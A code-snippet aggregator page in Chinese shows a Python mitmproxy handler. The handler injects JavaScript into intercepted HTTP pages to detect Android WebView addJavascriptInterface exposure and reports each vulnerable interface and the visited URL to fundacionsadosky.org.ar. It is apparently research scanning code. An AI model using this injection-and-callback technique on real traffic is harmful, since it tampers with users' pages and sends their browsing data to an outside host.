本文整理汇总了Python中Analyzer.Analyzer.handle_response方法的典型用法代码示例。如果您正苦于以下问题:Python Analyzer.handle_response方法的具体用法?Python Analyzer.handle_response怎么用?Python Analyzer.handle_response使用的例子?那么, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类Analyzer.Analyzer
的用法示例。
在下文中一共展示了Analyzer.handle_response方法的1个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: handle_response
# 需要导入模块: from Analyzer import Analyzer [as 别名]
# 或者: from Analyzer.Analyzer import handle_response [as 别名]
def handle_response(self, flow):
print "request path is %s " % flow.request.path
# If it's injectable and it's not the injected request
requested_site = flow.request.headers["Host"][0]
if flow.request.scheme.endswith("http") and requested_site.find("www.fundacionsadosky.org.ar") == -1:
visited_url = base64.b64encode(requested_site + flow.request.path)
#taken from www.droidsec.org/tests/addjsif/
script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}'''
content_type = flow.response.headers.get("Content-Type")
if not content_type:
content_type = flow.response.headers.get("Content-type")
if content_type and "text/html" in content_type[0]:
with decoded(flow.response): # automatically decode gzipped responses.
if flow.response.content:
try:
response = flow.response.content
print "Response is "+response
root = lxml.html.fromstring(response)
if root.find('.//*') is not None:
print "TRIED MODIFYING /html " + requested_site+ flow.request.path
# is HTML, use lxml to insert to head, body or script
append_in = root.find('.//head')
if append_in is None:
append_in = root.find('.//body')
elif append_in is None:
append_in = root.find('.//script').getparent()
else:
append_in = root
script = lxml.html.fromstring('<script>' + script + '</script>')
if append_in is not None:
append_in.append(script)
flow.response.content = lxml.html.tostring(root)
except:
print "There was a problem parsing the html response, skip it"
# mimetype may be application/javascript or text/javascript
elif content_type and "javascript" in content_type[0]:
with decoded(flow.response): # automatically decode gzipped responses.
print "TRIED MODIFYING /javascript " + requested_site + flow.request.path
# is searching for library .JS (both cases sensitive) or JQUERY
flow.response.content = script.encode("utf-8") + flow.response.content
Analyzer.handle_response(self,flow)